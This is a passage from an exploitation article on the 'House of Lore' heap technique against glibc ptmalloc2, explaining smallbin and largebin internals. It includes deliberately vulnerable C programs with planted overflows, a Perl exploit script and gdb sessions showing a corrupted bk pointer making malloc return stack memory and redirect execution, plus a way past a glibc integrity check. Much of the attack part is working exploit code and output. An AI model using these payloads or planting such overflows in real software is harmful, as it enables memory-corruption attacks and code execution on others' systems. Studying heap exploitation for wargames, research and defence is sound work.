+in order to do it, malloc uses the following instructions:
+
+
+   1) bck = victim->bk; // bck points to the penultimate chunk
+
+   2) bin->bk = bck;    // bck becomes the last chunk
+
+   3) bck->fd = bin;    // fd pointer of the new last chunk points
+                           to the bin to close the list again
+
+
+If all is correct, the user is given the pointer *mem of victim by the 
+macro "chunk2mem(victim)."
+
+The only extra tasks in this process are to set the PREV_INUSE bit of the
+contiguous chunk, and also to manage the NON_MAIN_ARENA bit if victim is 
+not in the main arena by default.
+
+And here is where the game starts.
+
+The only value that someone can control in this whole process is obviously 
+the value of "victim->bk". But to accomplish this, a necessary condition 
+must be satisfied:
+
+   1 - That two chunks have been allocated previously, that the latter has
+       been freed and that the first will be vulnerable to an overflow.
+
+If this is true, the overflow of the first chunk will allow to manipulate
+the header of the already freed second chunk, specifically the "bk" pointer
+because other fields are not interesting at this time. Always remember that
+the overflow must always occur after the release of this second piece, and
+I insist on it because we do not want to blow the alarms within 
+"_int_free()" before its time.
+
+As mentioned, if this manipulated second piece is introduced in its 
+corresponding bin and a new request of the same size is performed, the 
+smallbin code is triggered, and therefore come to the code that interests 
+us.
+
+"bck" is pointing to the altered "bk" pointer of victim and as a result, 
+will become the last piece in "bin->bk = bck". Then a subsequent call to 
+malloc( ) with the same size could deliver a chunk in the position of 
+memory with which we had altered the "bk" pointer, and if this were in the 
+stack we already know what happens.
+
+In this attack one must be careful with the sentence "bck->fd = bin" since 
+this code tries to write to the pointer "fd" the bin's address to close the
+linked list, this memory area must have writing permissions.
+
+The only last thing really important for the success of our attack:
+
+When a chunk is freed, it is inserted into the known "unsorted bin". This
+is a special bin, also a doubly linked list, with the peculiarity that the
+chunks are not sorted (obviously) according to the size. This bin is like a
+stack, the chunks are placed in this bin when they are freed and the chunks 
+will always been inserted in the first position.
+
+This is done with the intention that a subsequent call to "malloc( ),
+calloc( ) or realloc( )" can make use of this chunk if its size can fulfill
+the request. This is done to improve efficiency in the memory allocation 
+process as each chunk introduced in the unsorted bin has a chance to be 
+reused immediately without going through the sorting algorithm.
+
+How does this process work?
+
+All begins within "_int_malloc( )" with the next loop:
+
+   while ( (victim = unsorted_chunks(av)->bk) != unsorted_chunks(av))
+
+then takes the second last piece of the list:
+
+   bck = victim->bk
+
+checks if the memory request is within "in_smallbin_range( )", and it is
+checked whether the request could be met with victim. Otherwise, proceed to
+remove victim from unsorted bin with:
+
+
+  unsorted_chunks(av)->bk = bck;
+  bck->fd = unsorted_chunks(av);
+
+
+which is the same as saying: the bin points to the penultimate chunk, and
+the penultimate chunk points to the bin which becomes the latest chunk in
+the list.
+
+Once removed from the list, two things can happen. Either the size of the
+removed chunk matches with the request made (size == nb) in which case it
+returns the memory for this chunk to the user, or it does not coincide and 
+that's when we proceed to introduce the chunk in the adequate bin with:
+
+
+   bck = bin_at(av, victim_index);
+   fwd = bck->fd;
+   .....
+   .....
+   victim->bk = bck;
+   victim->fd = fwd;
+   fwd->bk = victim;
+   bck->fd = victim;
+
+
+Why do we mention this? Well, the condition that we mentioned requires that
+the freed and manipulated chunk will be introduced in its appropriate bin, 
+since as Phantasmal said, altering an unsorted chunk is not interesting at
+this time.
+
+With this in mind, our vulnerable program should call malloc( ) between the
+vulnerable copy function and the subsequent call to malloc( ) requesting 
+the same size as the chunk recently freed. In addition, this intermediate 
+call to malloc( ) should request a size larger than the released one, so 
+that the request can not be served from unsorted list of chunks and 
+proceeds to order the pieces into their respective bins.
+
+We note before completing this section that a bin of a real-life 
+application might contain several chunks of the same size stored and 
+waiting to be used. When a chunk comes from unsorted bin, that is inserted 
+into its appropriate bin as the first in the list, and according to our 
+theory, our altered chunk is not being used until it occupies the last 
+position (last(bin)). If this occurs, multiple calls to malloc( ) with the 
+same size must be triggered so that our chunk reaches the desired position 
+in the circular list. At that point, the "bk" pointer must be hacked.
+
+Graphically would pass through these stages:
+
+Stage 1: Insert victim into smallbin[ ].
+
+
+                   bin->bk  ___  bin->fwd
+                  o--------[bin]----------o
+                  !         ^ ^           !
+               [last]-------| |-------[victim]
+                 ^|   l->fwd    v->bk    ^|
+                 |!                      |!
+               [....]                  [....]
+                   \\                  //
+                    [....]        [....]
+                     ^ |____________^ |
+                     |________________|    
+
+
+Stage 2: "n" calls to malloc( ) with same size.
+
+
+                   bin->bk  ___  bin->fwd
+                  o--------[bin]----------o
+                  !         ^ ^           !
+              [victim]------| |--------[first]
+                 ^|   v->fwd    f->bk    ^|
+                 |!                      |!
+               [....]                  [....]
+                   \\                  //
+                    [....]        [....]
+                     ^ |____________^ |
+                     |________________|    
+
+
+Stage 3: Overwrite "bk" pointer of victim.
+
+
+                   bin->bk  ___  bin->fwd
+                  o--------[bin]----------o
+ & stack          !         ^ ^           !
+     ^--------[victim]------| |--------[first]
+        v->bk     ^   v->fwd    f->bk    ^|
+                  |                      |!
+               [....]                  [....]
+                   \\                  //
+                    [....]        [....]
+                     ^ |____________^ |
+                     |________________|  
+
+
+Stage 4: Last call to malloc( ) with same size.
+
+
+                   bin->bk  ___  bin->fwd
+                  o--------[bin]----------o
+ & -w- perm       !         ^ ^           !
+     ^--------[&stack]------| |--------[first]
+        v->bk     ^   v->fwd    f->bk    ^|
+                  |                      |!
+               [....]                  [....]
+                   \\                  //
+                    [....]        [....]
+                     ^ |____________^ |
+                     |________________|  
+
+
+It is where the pointer "*mem" is returned pointing to the stack and thus 
+giving full control of the attacked system. However as there are people who
+need to see to believe, read on next section.
+
+Note: I have not checked all versions of glibc, and some changes have been
+made since I wrote this paper. For example, on an Ubuntu box (with glibc
+2.11.1) we see the next fix:
+
+
+----- snip -----
+
+        bck = victim->bk;
+        if (__builtin_expect (bck->fd != victim, 0))
+          {
+            errstr = "malloc(): smallbin double linked list corrupted";
+            goto errout;
+          }
+        set_inuse_bit_at_offset(victim, nb);
+        bin->bk = bck;
+        bck->fd = bin;
+
+----- snip -----
+
+
+This check can still be overcome if you control an area into the stack and
+you can write an integer such that its value is equal to the address of the
+recently free chunk (victim). This must happen before the next call to
+malloc( ) with the same size requested.
+
+
+
+               << The grand aim of all science is to cover
+                  the greatest number of empirical facts
+                  by logical deduction from the smallest
+                  number of hypotheses or axioms. >>
+
+                                       [ Albert Einstein ]
+
+
+
+               .-------------------------.
+---[ 2.2.1 ---[   Triggering The HoL(e)   ]---
+               .-------------------------.
+
+After the theory... A practical example to apply this technique, here is a 
+detailed description:
+
+
+---[ thl.c ]---
+
+#include <stdio.h>
+#include <string.h>
+
+void evil_func(void)
+{
+    printf("\nThis is an evil function. You become a cool \
+hacker if you are able to execute it.\n"); 
+}
+
+void func1(void)
+{
+    char *lb1, *lb2;
+     
+    lb1 = (char *) malloc(128);
+    printf("LB1 -> [ %p ]", lb1);
+    lb2 = (char *) malloc(128);
+    printf("\nLB2 -> [ %p ]", lb2);
+
+    strcpy(lb1, "Which is your favourite hobby? ");
+    printf("\n%s", lb1);
+    fgets(lb2, 128, stdin);
+}
+
+int main(int argc, char *argv[])
+{
+    char *buff1, *buff2, *buff3;
+
+    malloc(4056);
+    buff1 = (char *) malloc(16);
+    printf("\nBuff1 -> [ %p ]", buff1);
+    buff2 = (char *) malloc(128);
+    printf("\nBuff2 -> [ %p ]", buff2);
+    buff3 = (char *) malloc(256);
+    printf("\nBuff3 -> [ %p ]\n", buff3);
+
+    free(buff2);
+
+    printf("\nBuff4 -> [ %p ]\n", malloc(1423));
+
+    strcpy(buff1, argv[1]);
+
+    func1();
+
+    return 0;
+}
+
+---[ end thl.c ]---
+
+
+The program is very simple, we have a buffer overflow in "buff1" and an
+"evil_func( )" function which is never called but which we want to run.
+
+In short we have everything we need in order to trigger THoL:
+
+1) Make a first call to malloc(4056), it shouldn't be necessary but we use 
+   to warm up the system. Furthermore, in a real-life application the heap 
+   probably won't be starting from scratch.
+
+2) We allocate three chunks of memory, 16, 128 and 256 bytes respectively,
+   since no chunks has been released before, we know that they must been 
+   taken from the Wilderness or Top Chunk.
+
+3) Free() the second chunk of 128 bytes. This is placed in the unsorted 
+   bin.
+
+4) Allocate a fourth piece larger than the most recently freed chunk. The
+   "buff2" is now extracted from the unsorted list and added to its 
+   appropriate bin.
+
+5) We have a vulnerable function strcpy( ) that can overwrite the header
+   of the chunk previously passed to free( ) (including its "bk" field).
+
+6) We call func1( ) which allocated two blocks of 128 bytes (the same size
+   as the piece previously released) to formulate a question and get a user
+   response.
+
+It seems that in point 6 there is nothing vulnerable, but everyone knows
+that if "LB2" point to the stack, then we may overwrite a saved return
+address. That is our goal, and we will see this approach.
+
+A basic execution could be like this:
+
+black@odisea:~/ptmalloc2$ ./thl AAAA
+
+[PTMALLOC2] -> (Chunk from TOP)
+Buff1 -> [ 0x804ffe8 ]
+[PTMALLOC2] -> (Chunk from TOP)
+Buff2 -> [ 0x8050000 ]
+[PTMALLOC2] -> (Chunk from TOP)
+Buff3 -> [ 0x8050088 ]
+
+[PTMALLOC2] -> (Freed and unsorted chunk [ 0x804fff8 ])
+[PTMALLOC2] -> (Chunk from TOP)
+Buff4 -> [ 0x8050190 ]
+
+[PTMALLOC2] -> (Smallbin code reached)
+[PTMALLOC2] -> (victim = [ 0x804fff8 ])
+[PTMALLOC2] -> (victim->bk = [ 0x804e188 ])
+LB1 -> [ 0x8050000 ]
+[PTMALLOC2] -> (Chunk from TOP)
+LB2 -> [ 0x8050728 ]
+Which is your favourite hobby: hack
+black@odisea:~/ptmalloc2$
+
+
+We can see that the first 3 malloced chunks are taken from the TOP, then 
+the second chunk (0x0804fff8) is passed to free() and placed in the 
+unsorted bin. This piece will remain here until the next call to malloc( ) 
+will indicate whether it can meet the demand or not.
+
+Since the allocated fourth buffer is larger than the recently freed, it's 
+taken again from TOP, and buff2 is extracted from unsorted bin to insert it
+into the bin corresponding to its size (128).
+
+After we see how the next call to malloc(128) (lb1) triggers smallbin code 
+returning the same address that the buffer previously freed. You can see 
+the value of "victim->bk" which is what should take (lb2) after this 
+address had been passed to the chunk2mem( ) macro.
+
+However, we can see in the output: the lb2 is taken from the TOP and not
+from a smallbin. Why? Simple, we've just released a chunk (only had a piece
+in the corresponding bin to the size of this piece) and since we have not 
+altered the "bk" pointer of the piece released, the next check:
+
+
+   if ( (victim = last(bin)) != bin)
+
+which is the same as:
+
+   if ( (victim = (bin->bk = oldvictim->bk)) != bin)
+
+will say that the last piece in the bin points to the bin itself, and
+therefore, the allocation must be extracted from another place.
+
+Until here all right, then, what do we need to exploit the program?
+
+1) Overwrite buff2->bk with an address on the stack near a saved return 
+   address (inside the frame created by func1( )).
+
+2) This address, in turn, must fall on a site such that the "bk" pointer of
+   this fake chunk will be an address with write permissions.
+
+3) The evil_func()'s address with which we want to overwrite EIP and the 
+   necessary padding to achieve the return address.
+
+Let's start with the basics:
+
+If we set a breakpoint in func1( ) and examine memory, we get:
+
+
+(gdb) x/16x $ebp-32
+0xbffff338:     0x00000000      0x00000000      0xbffff388      0x00743fc0
+0xbffff348:     0x00251340      0x00182a20      0x00000000      0x00000000
+0xbffff358:     0xbffff388      0x08048d1e      0x0804ffe8      0xbffff5d7
+0xbffff368:     0x0804c0b0      0xbffff388      0x0013f345      0x08050088
+
+EBP -> 0xbffff358
+RET -> 0xbffff35C
+
+
+But the important thing here is that we must alter buff2->bk with the
+"0xbffff33c" value so the new victim->bk take a writable address.
+
+Items 1 and 2 passed. The evil_func()'s address is:
+
+
+(gdb) disass evil_func
+Dump of assembler code for function evil_func:
+0x08048ba4 <evil_func+0>:       push   %ebp  
+
+
+And now, without further delay, let's see what happens when we merge all
+these elements into a single attack:
+
+
+black@odisea:~/ptmalloc2$ perl -e 'print "BBBBBBBB". "\xa4\x8b\x04\x08"' >
+evil.in
+
+...
+
+(gdb) run `perl -e 'print "A"x28 . "\x3c\xf3\xff\xbf"'` < evil.in                                                                            
+
+[PTMALLOC2] -> (Chunk from TOP)
+Buff1 -> [ 0x804ffe8 ] 
+[PTMALLOC2] -> (Chunk from TOP)
+Buff2 -> [ 0x8050000 ] 
+[PTMALLOC2] -> (Chunk from TOP)
+Buff3 -> [ 0x8050088 ]         
+
+[PTMALLOC2] -> (Freed and unsorted chunk [ 0x804fff8 ])
+[PTMALLOC2] -> (Chunk from TOP)                                                
+Buff4 -> [ 0x8050190 ]
+
+[PTMALLOC2] -> (Smallbin code reached)
+[PTMALLOC2] -> (victim = [ 0x804fff8 ])
+[PTMALLOC2] -> (victim->bk = [ 0xbffff33c ]) // First stage of attack
+LB1 -> [ 0x8050000 ]
+[PTMALLOC2] -> (Smallbin code reached)
+[PTMALLOC2] -> (victim = [ 0xbffff33c ])     // Victim in the stack
+[PTMALLOC2] -> (victim->bk = [ 0xbffff378 ]) // Address with write perms
+
+LB2 -> [ 0xbffff344 ]                        // Boom!
+Which is your favourite hobby?
+
+This is an evil function. You become a cool hacker if you are able to
+execute it.                                  // We get a cool msg.
+
+Program received signal SIGSEGV, Segmentation fault.
+0x08048bb7 in evil_func ()
+(gdb)
+
+
+You must be starting to understand now what I wanted to explain in the 
+preface of this article, instead of discovering or inventing a new 
+technique, what we have been doing for a long time is to find the way to 
+design a vulnerable application to this technique which had fallen us from 
+the sky a few years ago.
+
+Compile this example with normal GLIBC and you will get the same result, 
+only remember adjusting evil_func( ) address or the area where you have
+stored your custom arbitrary code.
+
+
+
+               << The unexamined life is not worth living. >>
+
+                                                 [ Socrates ]
+
+
+
+               .----------------------------.
+---[ 2.2.2 ---[   A More Confusing Example   ]---
+               .----------------------------.
+
+To understand how THoL could be applied in a real-life application, I 
+present below a source code created by me as if it were a game, that will
+offer a broader view of the attack.
+
+This is a crude imitation of an agent manager. The only thing this program
+can do is creating a new agent, editing it (ie edit their names and 
+descriptions) or deleting it. To save space, one could edit only certain 
+fields of an agent, leaving the other free without taking up memory or 
+freeing when no longer needed.
+
+In addition, to avoid unnecessary extensions in this paper, the entire
+information entered into the program is not saved in any database and only
+remains available while the application is in execution.
+
+
+---[ agents.c ]---
+
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+
+void main_menu(void);
+
+void create_agent(void);
+void select_agent(void);
+void edit_agent(void);
+void delete_agent(void);
+
+void edit_name(void);
+void edit_lastname(void);
+void edit_desc(void);
+void delete_name(void);
+void delete_lastname(void);
+void delete_desc(void);
+void show_data_agent(void);
+
+typedef struct agent {
+   int id;
+   char *name;
+   char *lastname;
+   char *desc;
+} agent_t;
+
+agent_t *agents[256];
+int agent_count = 0;
+int sel_ag = 0;
+
+int main(int argc, char *argv[])
+{
+      main_menu();
+}
+
+void main_menu(void)
+{
+   int op = 0;
+   char opt[2];
+
+   printf("\n\t\t\t\t[1] Create new agent");
+   printf("\n\t\t\t\t[2] Select Agent");
+   printf("\n\t\t\t\t[3] Show Data Agent");
+   printf("\n\t\t\t\t[4] Edit agent");
+   printf("\n\t\t\t\t[0] <- EXIT");
+   printf("\n\t\t\t\tSelect your option:");
+   fgets(opt, 3, stdin);
+
+   op = atoi(opt);
+   
+   switch (op) {
+	case 1:
+		create_agent();
+		break;
+	case 2:
+		select_agent();
+		break;
+	case 3:
+		show_data_agent();
+		break;
+	case 4:
+		edit_agent();
+		break;
+	case 0:
+           	 exit(0);
+    	default:
+	  	break;
+   }     
+
+   main_menu();
+}
+
+void create_agent(void)
+{
+   agents[agent_count] = (agent_t *) malloc(sizeof(agent_t));
+   sel_ag = agent_count;
+   agents[agent_count]->id = agent_count;
+   agents[agent_count]->name = NULL;
+   agents[agent_count]->lastname = NULL;
+   agents[agent_count]->desc = NULL;
+   printf("\nAgent %d created, now you can edit it", sel_ag);
+   agent_count += 1;
+}
+
+void select_agent(void)
+{
+   char ag_num[2];
+   int num;
+  
+   printf("\nWrite agent number: ");
+   fgets(ag_num, 3, stdin);
+   num = atoi(ag_num);
+
+   if ( num >= agent_count ) {
+       printf("\nOnly %d available agents, select another", agent_count);
+   } else {
+       sel_ag = num;
+       printf("\n[+] Agent %d selected.", sel_ag);
+   }
+}
+
+void show_data_agent(void)
+{
+   printf("\nAgent [%d]", agents[sel_ag]->id);
+
+   printf("\nName: "); 
+   if(agents[sel_ag]->name != NULL)
+       printf("%s", agents[sel_ag]->name);
+
+   printf("\nLastname: ");  
+   if(agents[sel_ag]->lastname != NULL)
+       printf("%s", agents[sel_ag]->lastname);
+   
+   printf("\nDescription: ");
+   if(agents[sel_ag]->desc != NULL)
+       printf("%s", agents[sel_ag]->desc);
+}
+
+void edit_agent(void)
+{
+   int op = 0;
+   char opt[2];
+
+   printf("\n\t\t\t\t[1] Edit name");
+   printf("\n\t\t\t\t[2] Edit lastname");
+   printf("\n\t\t\t\t[3] Edit description");
+   printf("\n\t\t\t\t[4] Delete name");
+   printf("\n\t\t\t\t[5] Delete lastname");
+   printf("\n\t\t\t\t[6] Delete description");
+   printf("\n\t\t\t\t[7] Delete agent");
+   printf("\n\t\t\t\t[0] <- MAIN MENU");
+   printf("\n\t\t\t\tSelect Agent Option: ");
+   fgets(opt, 3, stdin);
+
+   op = atoi(opt);
+
+   switch (op) {
+      case 1:
+           edit_name();
+	   break;
+      case 2:
+           edit_lastname();
+           break;
+      case 3:
+           edit_desc();
+           break;
+      case 4:
+           delete_name();
+   	   break;
+      case 5:
+           delete_lastname();
+           break;
+      case 6:
+           delete_desc();
+           break;
+      case 7:
+           delete_agent();
+           break;
+      case 0:
+           main_menu();
+      default:
+         break;
+   }
+  
+   edit_agent();
+}
+
+void edit_name(void)
+{
+   if(agents[sel_ag]->name == NULL) {
+      agents[sel_ag]->name = (char *) malloc(32);
+      printf("\n[!!!]malloc(ed) name [ %p ]", agents[sel_ag]->name);
+   }
+
+   printf("\nWrite name for this agent: ");
+   fgets(agents[sel_ag]->name, 322, stdin);
+}
+
+void delete_name(void)
+{
+   if(agents[sel_ag]->name != NULL) {
+      free(agents[sel_ag]->name);
+      agents[sel_ag]->name = NULL;
+   }
+}
+
+void edit_lastname(void)
+{
+   if(agents[sel_ag]->lastname == NULL) {
+      agents[sel_ag]->lastname = (char *) malloc(128);
+      printf("\n[!!!]malloc(ed) lastname [ %p ]",agents[sel_ag]->lastname);
+   }
+   
+   printf("\nWrite lastname for this agent: ");
+   fgets(agents[sel_ag]->lastname, 127, stdin);
+}
+
+void delete_lastname(void)
+{
+   if(agents[sel_ag]->lastname != NULL) {
+      free(agents[sel_ag]->lastname);
+      agents[sel_ag]->lastname = NULL;
+   }
+}
+
+void edit_desc(void)
+{
+   if(agents[sel_ag]->desc == NULL) {
+      agents[sel_ag]->desc = (char *) malloc(256);
+      printf("\n[!!!]malloc(ed) desc [ %p ]", agents[sel_ag]->desc);
+   }
+
+   printf("\nWrite description for this agent: ");
+   fgets(agents[sel_ag]->desc, 255, stdin);
+}
+
+void delete_desc(void)
+{
+   if(agents[sel_ag]->desc != NULL) {
+      free(agents[sel_ag]->desc);
+      agents[sel_ag]->desc = NULL;
+   }
+}
+
+void delete_agent(void)
+{
+    if (agents[sel_ag] != NULL) {
+        free(agents[sel_ag]);
+        agents[sel_ag] = NULL;
+    
+        printf("\n[+] Agent %d deleted\n", sel_ag);
+
+        if (sel_ag == 0) {
+            agent_count = 0;
+	      printf("\n[!] Empty list, please create new agents\n");
+        } else {
+	      sel_ag -= 1;
+            agent_count -= 1;
+	      printf("[+] Current agent selection: %d\n", sel_ag);
+        }
+    } else {
+        printf("\n[!] No agents to delete\n"); 
+    }
+}
+
+---[ end agents.c ]---
+
+
+This is the perfect program that I would present in a wargame to those who 
+wish to apply the technique described in this paper.
+
+
+Someone might think that maybe this program is vulnerable to other 
+techniques described in the Malloc Des-Maleficarum. Indeed given the 
+ability of the user to manage the memory space, it may seem that The House 
+of Mind can be applied here, but one must see that the program limits us to
+the creation of 256 structures of type "agent_t", and that the size of 
+these structures is about 432 bytes (approximately when you allocate all 
+its fields). If we multiply this number by 256 we get: (110592 = 0x1B000h) 
+which seems too small to let us achieve the desirable address "0x08100000" 
+necessary to corrupt the NON_MAIN_ARENA bit of an already allocated chunk 
+above that address (and thus create a fake arena in order to trigger the 
+attack aforementioned).
+
+Another technique that one would take as viable would be The House of Force
+since at first it is easy to corrupt the Wilderness (the Top Chunk), but
+remember that in order to apply this method one of the requirements is that
+the size of a call to malloc( ) must been defined by the designer with the
+main goal of corrupting "av->top". This seems impossible here.
+
+Other techniques are also unworkable for several reasons, each due to their
+intrinsic requirements. So we must study how to sort the steps that trigger
+the vulnerability and the attack process that we have studied so far.
+
+Let's see in detail:
+
+After a quick look, we found that the only vulnerable function is:
+
+
+   void edit_name(void) {
+      ...
+         agents[sel_ag]->name = (char *) malloc(32);
+      ...
+      fgets(agents[sel_ag]->name, 322, stdin);
+
+
+At first it seems a simple typographical error, but it allows us to 
+override the memory chunk that we allocated after "agents[]->name", which
+can be any, since the program allows practically a full control over 
+memory.
+
+To imitate the maximum possible vulnerable process shown in the previous
+section, the most obvious thing we can do to start is to create a new agent
+(0) and edit all fields. With this we get:
+
+
+   malloc(sizeof(agent_t));  // new agent
+   malloc(32);               // agents[0]->name
+   malloc(128);              // agents[0]->lastname
+   malloc(256);              // agents[0]->desc
+
+
+The main target is to overwrite the "bk" pointer in the field 
+"agents[]->lastname" if we have freed this chunk previously. Moreover, 
+between these two actions, we need to allocate a chunk of memory to be
+selected from the "TOP code", so that the chunks present in the unsorted 
+bin are sorted in their corresponding bins for a later reuse.
+
+For this, what we do is create a new agent(1), select the first agent(0) 
+and delete its field "lastname", select the second agent(1) and edit its
+description. This is equal to:
+
+
+   malloc(sizeof(agent_t));      // Get a chunk from TOP code      
+   free(agents[0]->lastname);    // Insert chunk at unsorted bin
+   malloc(256);                  // Get a chunk from TOP code
+
+
+After this last call to malloc( ), the freed chunk of 128 bytes (lastname)
+will have been placed in its corresponding bin. Now we can alter "bk" 
+pointer of this chunk, and for this we select again the first agent(0) and 
+edit its name (here there will be no call to malloc( ) since it has been 
+previously assigned).
+
+At this time, we can place a proper memory address pointing to the stack 
+and make two calls to malloc(128), first editing the "lastname" field of 
+the second agent(1) and then editing the "lastname" field of agent(0) one
+more time.
+
+These latest actions should return a memory pointer located in the stack in
+a position of your choice, and any written content on "agents[0]->lastname"
+could corrupt a saved return address.
+
+Without wishing to dwell too much more, we show here how a tiny-exploit 
+alter the above pointer "bk" and returns a chunk of memory located in the
+stack:
+
+
+---[ exthl.pl ]---
+
+#!/usr/bin/perl
+
+print "1\n" .              # Create agents[0]
+      "4\n" .              # Edit agents[0]
+      "1\nblack\n" .       # Edit name agents[0]
+      "2\nngel\n" .        # Edit lastname agents[0]
+      "3\nsuperagent\n" .  # Edit description agents[0]
+      "0\n1\n" .           # Create agents[1]
+      "2\n0\n" .           # Select agents[0]
+      "4\n5\n" .           # Delete lastname agents[0]
+      "0\n2\n1\n" .        # Select agents[1]
+      "4\n" .              # Edit agents[1]
+      "3\nsupersuper\n" .  # Edit description agents[1]
+      "0\n2\n0\n" .        # Select agents[0]
+      "4\n" .              # Edit agents[0]
+      "1\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
+      "\x94\xee\xff\xbf" . # Edit name[0] and overwrite "lastname->bk"
+      "\n0\n2\n1\n" .      # Select agents[1]
+      "4\n" .              # Edit agents[1]
+      "2\nother\n" .       # Edit lastname agents[1]
+      "0\n2\n0\n" .        # Select agents[0]
+      "4\n" .              # Edit agents[0]
+      "2\nBBBBBBBBBBBBBBBBBBBBB" .
+      "BBBBBBBBBBBBBBBBBBBBBBBBBBBB\n"; # Edit lastname agents[0]
+                                        # and overwrite a {RET}
+
+---[ end exthl.pl ]---
+
+
+And here is the result, displaying only the outputs of interest for us:
+
+
+black@odisea:~/ptmalloc2$ ./exthl | ./agents
+.....      
+
+[PTMALLOC2] -> (Smallbin code reached)              
+[PTMALLOC2] -> (victim = [ 0x8 ])             // Create new agents[0]    
+Agent 0 created, now you can edit it                
+
+.....
+
+[PTMALLOC2] -> (Chunk from TOP)                       
+[!!!]malloc(ed) name [ 0x804f020 ]            // Edit name agents[0]          
+Write name for this agent:                            
+
+.....
+
+[PTMALLOC2] -> (Chunk from TOP)                       
+[!!!]malloc(ed) lastname [ 0x804f048 ]        // Edit lastname agents[0]
+Write lastname for this agent:                        
+
+.....
+  
+[PTMALLOC2] -> (Chunk from TOP)                       
+[!!!]malloc(ed) desc [ 0x804f0d0 ]           // Edit description agents[0]                  
+Write description for this agent:                     
+
+.....
+  
+[PTMALLOC2] -> (Chunk from TOP)                       
+Agent 1 created, now you can edit it         // Create new agents[1]
+         
+.....
+  
+Write agent number:                                   
+[+] Agent 0 selected.                        // Select agents[0]         
+
+.....
+ 
+[PTMALLOC2] -> (Freed and unsorted [ 0x804f040 ] chunk) // Delete lastname
+
+.....
+  
+Write agent number:                                    
+[+] Agent 1 selected.                        // Select agents[1]           
+
+.....
+  
+[PTMALLOC2] -> (Chunk from TOP)                        
+[!!!]malloc(ed) desc [ 0x804f1f0 ]           // Edit description agents[1]             
+Write description for this agent:                      
+
+.....
+
+Write agent number:                                    
+[+] Agent 0 selected.                        // Select agents[0] 
+
+.....
+  
+Write name for this agent:                   // Edit name agents[0]                     
+   
+Write agent number:                                    
+[+] Agent 1 selected.                        // Select agents[1]
+
+.....
+
+[PTMALLOC2] -> (Smallbin code reached)                 
+[PTMALLOC2] -> (victim = [ 0x804f048 ])                
+[PTMALLOC2] -> (victim->bk = [ 0xbfffee94 ])           
+
+[!!!]malloc(ed) lastname [ 0x804f048 ]
+Write lastname for this agent:               // Edit lastname agents[1]
+
+.....
+ 
+Write agent number:                                   
+[+] Agent 0 selected.                        // Select agents[0]          
+
+.....
+
+[PTMALLOC2] -> (Smallbin code reached)
+[PTMALLOC2] -> (victim = [ 0xbfffee94 ])
+[PTMALLOC2] -> (victim->bk = [ 0xbfffeec0 ])
+
+[!!!]malloc(ed) lastname [ 0xbfffee9c ]     // Edit lastname agents[0]
+Segmentation fault
+black@odisea:~/ptmalloc2$
+
+
+Everyone can predict what happened in the end, but GDB can clarify for us a
+few things:
+
+
+----- snip -----
+
+[PTMALLOC2] -> (Smallbin code reached)
+[PTMALLOC2] -> (victim = [ 0xbfffee94 ])
+[PTMALLOC2] -> (victim->bk = [ 0xbfffeec0 ])
+
+[!!!]malloc(ed) lastname [ 0xbfffee9c ]
+
+Program received signal SIGSEGV, Segmentation fault.
+0x080490f6 in edit_lastname ()
+(gdb) x/i $eip
+0x80490f6 <edit_lastname+150>:  ret
+(gdb) x/8x $esp
+0xbfffee9c:     0x42424242      0x42424242      0x42424242      0x42424242
+0xbfffeeac:     0x42424242      0x42424242      0x42424242      0x42424242
+(gdb)
+
+----- snip -----
+
+
+And you have moved to the next level of your favorite wargame, or at least
+you have increased your level of knowledge and skills. 
+
+Now, I encourage you to compile this program with your regular glibc (not
+static Ptmalloc2), and verify that the result is exactly the same, it does
+not change the inside code.
+
+I don't know if anyone had noticed, but another of the techniques that in 
+principle could be applied to this case is the forgotten The House of 
+Prime. The requirement for implementing it is the manipulation of the 
+header of two chunks that will be freed. This is possible since an overflow
+in agents[]->name can override both agents[]->lastname and agents[]->desc, 
+and we can decide both when freeing them and in what order. However, The 
+House of Prime needs also at least the possibility of placing an integer
+on the stack to overcome a last check and this is where it seems that we
+stay trapped. Also, remember that since glibc 2.3.6 one can no longer pass 
+to free( ) a chunk smaller than 16 bytes whereas this is the first 
+requirement inherent to this technique (alter the size field of the first 
+piece overwritten 0x9h = 0x8h + PREV_INUSE bit).
+
+
+
+               << It is common sense to take a method and
+                  try it; if it fails, admit it frankly and
+                  try another. But above all, try something. >>
+
+                                      [ Franklin D. Roosevelt ]
+
+
+
+           .------------------------------.
+---[ 3 ---[   LargeBin Corruption Method   ]---
+           .------------------------------.
+
+In order to apply the method recently explained to a largebin we need the 
+same conditions, except that the size of the chunks allocated should be 
+above 512 bytes as seen above.
+
+However, in this case the code triggered in "_int_malloc( )" is different 
+and more complex. Extra requirements will be necessary in order to achieve 
+a successful execution of arbitrary code.
+
+We will make some minor modifications to the vulnerable program presented
+in 2.2.1 and will see, through the practice, which of these preconditions
+must be met.
+
+Here is the code:
+
+
+---[ thl-large.c ]---
+
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+
+void evil_func(void)
+{
+    printf("\nThis is an evil function. You become a cool \
+              hacker if you are able to execute it\n"); 
+}
+
+void func1(void)
+{
+    char *lb1, *lb2;
+     
+    lb1 = (char *) malloc(1536);
+    printf("\nLB1 -> [ %p ]", lb1);
+    lb2 = malloc(1536);
+    printf("\nLB2 -> [ %p ]", lb2);
+
+    strcpy(lb1, "Which is your favourite hobby: ");
+    printf("\n%s", lb1);
+    fgets(lb2, 128, stdin);
+}
+
+int main(int argc, char *argv[])
+{
+    char *buff1, *buff2, *buff3;
+
+    malloc(4096);
+    buff1 = (char *) malloc(1024);
+    printf("\nBuff1 -> [ %p ]", buff1);
+    buff2 = (char *) malloc(2048);
+    printf("\nBuff2 -> [ %p ]", buff2);
+    buff3 = (char *) malloc(4096);
+    printf("\nBuff3 -> [ %p ]\n", buff3);
+
+    free(buff2);
+
+    printf("\nBuff4 -> [ %p ]", malloc(4096));
+
+    strcpy(buff1, argv[1]);
+
+    func1();
+
+    return 0;
+}
+
+---[ end thl-large.c ]---
+
+
+As you can see, we still need an extra reserve (buff4) after releasing the 
+second allocated chunk. This is because it's not a good idea to have a 
+corrupted "bk" pointer in a chunk that still is in the unsorted bin. When 
+it happens, the program usually breaks sooner or later in the instructions:
+
+
+      /* remove from unsorted list */
+      unsorted_chunks(av)->bk = bck;
+      bck->fd = unsorted_chunks(av);
+
+
+But if we do not make anything wrong before the recently freed chunk is 
+placed in its corresponding bin, then we pass without penalty or glory the 
+next area code:
+
+
+    while ( (victim = unsorted_chunks(av)->bk) != unsorted_chunks(av)) {
+       ...
+    }
+
+
